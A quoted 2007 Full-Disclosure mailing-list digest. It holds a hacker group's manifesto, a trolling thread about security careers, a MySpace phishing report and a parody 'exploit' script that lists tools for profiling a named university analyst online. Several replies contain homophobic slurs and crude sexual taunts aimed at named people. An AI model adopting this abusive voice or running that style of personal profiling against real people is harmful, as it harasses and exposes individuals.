>400-500 Thousand lines of src analysis
>Solaris Kernel internals book
>Sparc ASM
>windows kernel analysis & exploitation
>Prolog
>Artificial Intelligence
>Compilers
>SIMD
>ISP Design
>Database Design ISBN: 0321204484
>Sysvmalloc exploitation
>IOS malloc exploitation
>RTL malloc exploitation
>kmalloc exploitation
>ATM
>VPN?s
>DecNet
>Cryptography
>Linear algebra
>}
>Level 4: Parallelism, Distributiveness, Diversity
>{
>OpenVMS Scheduler ISBN: 1555581560
>OpenVMS Memory Managment ISBN: 1555581595
>Real Time Scheduling Design ISBN: 0387231374
>HP-UX Kernel internals ISBN: 0130328618
>Distributed Operating Systems ISBN: 0132199084
>VHDL ISBN: 0471899720
>Verilog
>Designing a MAC Model (like selinux)
>Designing BOF Protection (like PAX)
>Parallel Architectures
>Parallel Algorithm Design
>Advanced Artificial Intelligence
>Alpha
>PowerPC
>PA-RISC
>ARM
>M68K
>OpenVMS using
>HP-UX using
>Digital Image Processing
>Digital Signal Processing
>Electrical Engineering Basics
>Circuit Board Design
>}
>The rchrafe will resume tutorials of the Mod 1 on the 1st of
>December
>2007, in the channel #crx under irc.efnet.org/pl/ru
>We will not accommodate stupidity.
>The key will be revealed on rchrafe.wordpress.com at midnight, the
>1st
>of december 2007 for all to join!
>
>Well will rise!
>
>
>
>------------------------------
>
>Message: 11
>Date: Tue, 20 Nov 2007 07:13:02 +0100
>From: rchrafe <rchrafe@...il.com>
>Subject: [Full-disclosure] The Call to Reason
>To: full-disclosure@...ts.grok.org.uk
>Message-ID: <47427AEE.2060404@...il.com>
>Content-Type: text/plain; charset=windows-1252; format=flowed
>
>?The Call to Reason.?
>By the rhcrafe Senior seat of officials.
>BEHOLD AND WITNESS, those who read this document, this which
>is the official PROCLAMATION and LETTER OF INTENT concerning
>the future of RCHRAFE and RCHRAFE member states; the words within
>are no less than the movement of RCHRAFE from its widely
>admired position in the computer underground to an overt
>existence as a world renowned hacking into computer machines
>authority.
>REGARDING the current social state of hacking into computer
>machines, RCHRAFE takes no stance. As an autonomous body
>with goals unrelated to what is largely considered ?the
>hacking community?, RCHRAFE recognizes no entities nor social
>classes other than RCHRAFE and anti-RCHRAFE. Abstract concepts
>such as ?black hat? and ?white hat? do thus not exist in
>the lexicon of RCHRAFE politics, and are irrelevant to our goals.
>What then, are the goals and motivations of this powerful
>force that has developed over the years, that has come
>to be known as RCHRAFE? No less than the subjugation of
>power in the computer machine community. It is at this
>time appropriate to state COMMUNIQUE POINT NUMBER ONE:
>?RCHRAFE DOES NOT AFFILIATE IN CONCEPT WITH ANY EXISTING
>POLITICAL OR SOCIAL ENTITIES. RCHRAFE IS IN AND OF ITSELF,
>A SOCIAL PHENOMENON OF ADEQUATE STATURE TO STAND WITHOUT
>ASSISTANCE OR AFFILIATION.?
>It should be pointed out that although RCHRAFE has strong
>ties to the American Republican Party and political
>republican ideology, we do not participate actively
>in government politics of any kind.
>PERTAINING TO the overall goals of RCHRAFE as an organization
>and the pervasive RCHRAFE social movement, we have distinct
>purpose and bearing.
>While RCHRAFE assimilates no political or social goals in
>and of themselves, we reserve the right to voice opinion
>when political or social policies or activities relate
>to these aforementioned goals.
>These goals, stated, comprise COMMUNIQUE POINT NUMBER
>TWO:
>?RCHRAFE EXISTS ENTIRELY FOR THE ADVANCEMENT OF MEMBERS,
>MEMBER INTEREST, AND HAQING INTO COMPUTER MACHINES.?
>We may surmise in corollary then, by the combined
>observations of communique points one and two, that RCHRAFE
>is in definition a usurping entity, and will tend to
>remain benign concerning rival computer groups.
>TO CONCLUDE, RCHRAFE will exist as long as the interests
>of the corollaries are subject to external change. We
>reserve the right to maintain the status of RCHRAFE and
>the goals of the corollaries by any mean necessary, but
>never by exceeding necessary means.
>We Shall Rise!
>
>
>
>------------------------------
>
>Message: 12
>Date: Tue, 20 Nov 2007 07:33:09 +0100
>From: rchrafe <rchrafe@...il.com>
>Subject: Re: [Full-disclosure] How to become a Computer Security
> Professional ?
>To: worried security <worriedsecurity@...glemail.com>
>Cc: full-disclosure@...ts.grok.org.uk
>Message-ID: <47427FA5.2090307@...il.com>
>Content-Type: text/plain; charset=ISO-8859-1; format=flowed
>
>worried security wrote:
>> On Nov 17, 2007 1:08 PM, Meef <massa@...-dhaka.edu> wrote:
>>
>>> What are the steps to follow to become a computer security
>professional ?,
>>>
>>
>> Sorry, you will never make it to professionalism as you broke
>the
>> first and most important rule.
>>
>> NEVER POST ON A PUBLIC MAILING LIST!!!!
>>
>
>And you are here because, you are 'worried security'.
>> The second most important rule of becoming a security
>professional is,
>> if you do need to post to a public mailing list then never do it
>under
>> a .edu or .gov or official company e-mail address, we will all
>just
>> point and laugh and have your account hi-jacked with the next
>> cross-site scripting flaw that gets to to the public mailing
>list.
>>
>>
>But I thought the first most important rule, which was not to be
>broken,
>was not to post on a security mailing list, such as this.
>
>Kindly go through your cross-site request forgery techniques with
>me,
>I'm really in need of a m3nt0r
>> The third most important rule to becoming a security
>professional is
>> never talk to people on public mailing lists who have broken
>rule one
>> and rule two or take whats said on public mailing lists
>seriously. As
>> soon as you take what is said on a public mailing list seriously
>is
>> the day you should cut your wrists.
>>
>>
>He's getting so horny right now
>> Always get advice from a credible source after learning of a
>threat on
>> the public mailing lists.
>>
>Like worried security?
>
>Please tell me if you think the linux/tcp stack is currently
>vulnerable.
>
>I have N0 1D34
>> The forth most important rule to becoming a security
>professional,
>> always use a throw-away e-mail account so it doesn't matter of
>script
>> kids hi-jack your e-mail account with the next cross-site
>scripting
>> vulnerablity that gets posted to the public mailing lists.
>>
>
>HIJACK THIS BITCH
>> The fifth most important rule to becoming a security
>professional is
>> use an alias on public mailing lists, never use your real name,
>place
>> of work, place of education, place of living, as backfires
>cannot be
>> reversed. Once you've post something its post, archived around
>the
>> world and translated into more languages than you can shake a
>stick
>> at.
>>
>>
>Y0u juzt m1ght be shirl0ck h0lm3z
>> The sixth most important rule to becoming a security
>professional is
>> be paranoid. Yes, don't listen to people who say paranoia is bad
>for
>> you. In this industry it pays to be paranoid. Forget about your
>own
>> welfare, you've got millions of users and the economic stability
>of
>> the world to think about. Trade in your own life to save the
>life of
>> others. Indeed being a security professional will mean long
>hours, and
>> sleepless nights. Be prepared to be woken up in the middle of
>the
>> night and expect to have people shouting for answers down the
>phone to
>> you or rush you into the security operations center when news of
>a
>> major data breach reaches the inbox of your security team.
>>
>"Be prepared to be woken up in the middle of the
>night and expect to have people shouting for answers down the
>phone to
>
>you or rush you into the security operations center when news of a
>major data breach reaches the inbox of your security team."
>
>This is what a professional at computer security undergoes?
>
>I thought I could just, be in my bedroom reading about aix
>security enhancements and win32 buffer overflow prevention methods
>
>> The seventh most important rule to becoming a security
>professional.
>> Think for yourself don't post ridiculous questions to a public
>mailing
>> list and expect to get the right answer, most folks will make
>anything
>> up and people generally cannot be trusted. Use search engines,
>read
>> books and free your mind from what other security researchers
>are
>> doing. Don't duplicate, originate your own work.
>>
>
>He talks a whole lot about mailing lists
>> The eighth most important rule to becoming a good security
>> professional is have balls, if you think something is wrong,
>don't be
>> affraid to speak up, even if it means losing your job. Remember,
>the
>> security of other people comes before the security of your job
>> position. So if you think something is wrong, tell people about
>it,
>> and if they don't listen, then keep repeating it over and over.
>Never
>> give in and keep on trying to tell people about something you
>believe
>> in. You are a slave to the security of others, you don't come
>first
>> "they" do.
>>
>
>So what's wrong buddy?
>> Ninth most important rule to becoming a good security
>professional.
>> Don't read public mailing lists, don't read security news sites,
>and
>> don't read web logs about what other people think about
>security. They
>> all suck, don't trust anyone in this world and don't believe the
>hype.
>> 99.9% of anything post in public is attention grabbing bullshit,
>you
>> don't need it. Concentrate with whats going on within your own
>company
>> and screw all the others. Only read these mediums if its related
>to
>> what you're doing that day at work to fix a bug or thrawt a
>security
>> incident. Don't read about what could happen, stick to with
>whats
>> actually happening to you that day. Not what other people say is
>going
>> to happen next week.
>>
>> Tenth most important rule to becoming a security professional,
>know
>> your enemy. Yes, get to know them, eavesdrop on them, send them
>gifts
>> and make them feel special. Your enemy is the single most
>important
>> person to you and your company's assets. If you don't know what
>your
>> enemy is doing then you don't have security. Remember though,
>don't
>> concetrate on other peoples enemies, concentrate on enemies for
>your
>> company. Don't read websites that say they are your enemy,
>because its
>> unlikely they really are. Your real enemies don't announce
>themselves
>> often and are unlikely to make public announcements about it,
>and the
>> ones that do are usually hoaxes.
>>
>
>Fuck, I couldn't read it all.. I got exhauzted
>
>rchrafe.wordpress.com
>
>
>
>------------------------------
>
>Message: 13
>Date: Tue, 20 Nov 2007 07:46:58 +0100
>From: rchrafe <rchrafe@...il.com>
>Subject: Re: [Full-disclosure] How to become a Computer Security
> Professional ?
>To: Richard Golodner <rgolodner@...ratection.com>
>Cc: full-disclosure@...ts.grok.org.uk
>Message-ID: <474282E2.50009@...il.com>
>Content-Type: text/plain; charset=ISO-8859-1; format=flowed
>
>Richard Golodner wrote:
>> Get a good job where you can find best security practices being
>used
>> and learn from others who have been in the field. You will
>develop your own
>> set of tools and ideas, but the concepts are almost always the
>same. Defense
>> in depth is a good idea and it works.
>> 11th most important rule. Never ever take advice that has ten
>rules
>> about something they know nothing about.
>> N3TD3V, please go away. Come back under a different alias if
>you
>> must but please STFU!
>> The guy wanted a serious answer and you broke many of your own
>> rules. Don't get your kilt all bunched up, just be serious for
>once in your
>> net-sec career.
>> Richard Golodner
>> Infratection IT Services
>>
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>>
>You're so gay dude
>
>
>
>------------------------------
>
>Message: 14
>Date: Tue, 20 Nov 2007 07:49:20 +0100
>From: rchrafe <rchrafe@...il.com>
>Subject: Re: [Full-disclosure] How to become a Computer Security
> Professional ?
>To: XSS Worm XSS Security Information Portal
> <cross-site-scripting-security@...worm.com>
>Cc: full-disclosure@...ts.grok.org.uk
>Message-ID: <47428370.6050500@...il.com>
>Content-Type: text/plain; charset=ISO-8859-1; format=flowed
>
>XSS Worm XSS Security Information Portal wrote:
>> #!/bin/sh
>>
>> # 0day exploit for Paul Schmehl
>> # based on information provided by Paul Schmehl
>> # pauls@...allas.edu <mailto:pauls@...allas.edu>
>> #
>>
>> echo pauls > /hack/edu/utdallas.edu/known.addresses
>>
>> googledump.pl --email-addresses --context-links
>> --referers --extended-links -keywords
>"Paul","Schmehl","utdallas.edu
>> <http://utdallas.edu>", "pauls@", "pauls@...allas
>> ","paul.schmehl@" --verbose
>>
>> socialgrab.pl --known-address "pauls@...allas.edu
>> <mailto:pauls@...allas.edu>" --real-name "Paul Schmehl"
>> --tags=security,hacking,utdallas,vulnerability
>> --
>search=facebook,youtube,live,myspace,igoogle,yahoo,netvouz,rojo,dig
>g,bebo,ebay,blogger,wordpress
>> --verbose --dump-links
>>
>> infopull.pl --pgp-search --whois --domaintools --usenet --
>trackers
>> --irclog --mirrors --listserv --known-
>addresses="pauls@...allas.edu
>> <mailto:pauls@...allas.edu>"
>>
>> echo "Paul Schmehl" >> /hack/TO-DO/pauls.at.utdallas.dot.edu
>>
>> # http://xssworm.com
>HAHAHAHAHAHAHHAAHAHAHAHAHAHAHHAAHAHAHAHAHAHAHHAAHAHAHAHAHAHAHHAAHAH
>AHAHAHAHAHHAAHAHAHAHAHAHAHHAAHAHAHAHAHAHAHHAAHAHAHAHAHAHAHHAAHAHAHA
>HAHAHAHHAAHAHAHAHAHAHAHHAAHAHAHAHAHAHAHHAA
>
>>
>>
>>
>>
>>
>> On 11/19/07, *Paul Schmehl* <pauls@...allas.edu
>> <mailto:pauls@...allas.edu>> wrote:
>>
>> --On November 19, 2007 3:34:23 AM +0000 worried security
>> <worriedsecurity@...glemail.com
>> <mailto:worriedsecurity@...glemail.com>> wrote:
>> >
>> > The forth most important rule to becoming a security
>professional,
>> > always use a throw-away e-mail account so it doesn't
>matter of
>> script
>> > kids hi-jack your e-mail account with the next cross-site
>scripting
>> > vulnerablity that gets posted to the public mailing lists.
>> >
>> You forgot the most important rule of all. Pay no heed to
>bozos
>> who post
>> anonymously and don't even have a job in security. Their
>advice is
>> usually worth just as much as their reputation.
>>
>> Paul Schmehl ( pauls@...allas.edu
><mailto:pauls@...allas.edu>)
>> Senior Information Security Analyst
>> The University of Texas at Dallas
>> http://www.utdallas.edu/ir/security/
>> <http://www.utdallas.edu/ir/security/>
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-
>charter.html
>> <http://lists.grok.org.uk/full-disclosure-charter.html>
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>>
>>
>>
>> --
>> Francesco Vaj [CISSP - GIAC]
>> CSS Security Researcher
>> mailto: vaj@...pam.xssworm.com <mailto:vaj@...pam.xssworm.com>
>> aim: XSS Cross Site
>> ------
>> XSS Cross Site Scripting Attacks
>> Web 2.0 Application Security Information Blog (tm) 2007
>> http://www.XSSworm.com/
>> ------
>> "Vaj, bella vaj.
>
>
>
>------------------------------
>
>Message: 15
>Date: Mon, 19 Nov 2007 20:52:30 -0800
>From: "Dancho Danchev" <dancho.danchev@...il.com>
>Subject: [Full-disclosure] Large Scale MySpace Phishing Attack
>To: full-disclosure@...ts.grok.org.uk
>Message-ID:
> <b787ce30711192052k34755398t7a9c2c3c1c98418@...l.gmail.com>
>Content-Type: text/plain; charset=ISO-8859-1
>
>In need of a "creative phishing campaign of the year"? Try this,
>perhaps the largest phishing attack spoofing MySpace and
>collecting
>all the login details at a central location, that's been active
>for
>over a month, and continues to be. A Chinese phishing group has
>come
>up with legitimate looking MySpace profiles (profile.myspace.com)
>in
>the form of subdomains at their original .cn domains, and by doing
>so
>achieve its ultimate objective - establish trust through
>typosquatting, remain beneath the security vendors radar by
>comment
>spamming the URLs inside MySpace, and obtain the login details of
>everyone who got tricked.
>
>Complete assessment in the form of domains and URLs participating,
>as
>well as the message used per domain for the internal comment spam
>campaign, is available here :
>
>http://ddanchev.blogspot.com/2007/11/large-scale-myspace-phishing-
>attack.html
>
>Regards,
>Dancho
>
>
>
>------------------------------
>
>Message: 16
>Date: Mon, 19 Nov 2007 23:25:04 -0500 (GMT-05:00)
>From: Elazar Broad <elazarb@...thlink.net>
>Subject: Re: [Full-disclosure] Multiple stack-based buffer
>overflows
> in dxmsft.dll
>To: "full-disclosure@...ts.grok.org.uk"
> <full-disclosure@...ts.grok.org.uk>
>Message-ID:
> <22163281.1195532704914.JavaMail.root@...amui-
>rubis.atl.sa.earthlink.net>
>
>Content-Type: text/plain; charset=UTF-8
>
>I did not see this: http://www.milw0rm.com/exploits/4251, my
>apologies, please ignore my last post...
>
>
>
>------------------------------
>
>Message: 17
>Date: Tue, 20 Nov 2007 08:34:58 +0100
>From: rchrafe <rchrafe@...il.com>
>Subject: Re: [Full-disclosure] so gay huh?
>To: Richard Golodner <rgolodner@...ratection.com>,
> full-disclosure@...ts.grok.org.uk
>Message-ID: <47428E22.5060807@...il.com>
>Content-Type: text/plain; charset=ISO-8859-1; format=flowed
>
>Richard Golodner wrote:
>> Please come and introduce yourself to me at any Info-Sec
>conference
>> or convention so we can meet face to face. We will see what is
>up then.
>> Richard Golodner
>>
>
>Mr Golodner,
> I'm currently unaware as to why you want us to come and
>meet
>you at
>an info-sec conference, or convention, things like defcon and HOPE
>are
>for the
>utterly pathetic.
>
>We don't know what to say, you're too funny to take seriously.
>
>Never email us again, you piece of garbage.
>
>rcbrafe
>
>
>
>------------------------------
>
>Message: 18
>Date: Tue, 20 Nov 2007 08:57:18 +0100
>From: rchrafe <rchrafe@...il.com>
>Subject: Re: [Full-disclosure] so gay huh?
>To: Richard Golodner <rgolodner@...ratection.com>,
> full-disclosure@...ts.grok.org.uk
>Message-ID: <4742935E.4060008@...il.com>
>Content-Type: text/plain; charset=ISO-8859-1; format=flowed
>
>Richard Golodner wrote:
>> You think those are professional conferences? Those are script
>> children parties for retards that can't get laid.
>LOL -- Like my, RCHRAFE didn't know this.
>> Come to a Homeland
>> Security meeting
>Our affiliates are members of several.
>> or a National Security briefing.
>What about CTU ?
>> You can't even hide your
>> own identity properly.
>>
>..
>You know who we are?
>
>SHIT
>We're going to die a sudden death!
>> I did not say I wanted to meet you.
>That's too bad, I'm horny f0r y0u
>> What I am saying is that if you
>> are so tough, step and be a man.
>/me stepz up & becomez 4 m4n
>> At least use your real name or I will begin
>> to publicize it for you if you would like.
>>
>Firstly: Richard Golodner i love pissing you off, it gets me off.
>Secondly: Your post previously sometime ago made me cum all over
>my
>k3yb04rd: http://osdir.com/ml/network.nsp.cisco/2003-
>08/msg00019.html
>
>You probably don't know the difference between IGRP and EIGRP
>routing
>protocolz
>
>What a loser, haha.
>
>
>
>------------------------------
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
>
>End of Full-Disclosure Digest, Vol 33, Issue 38
>***********************************************
--
Click to begin your health care training online. Request info today.
http://tagline.hushmail.com/fc/Ioyw6h4fOHYjfAEobiMPrx3XchsUpwoPDFF8YRhkb8de1zUc0aerIM/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists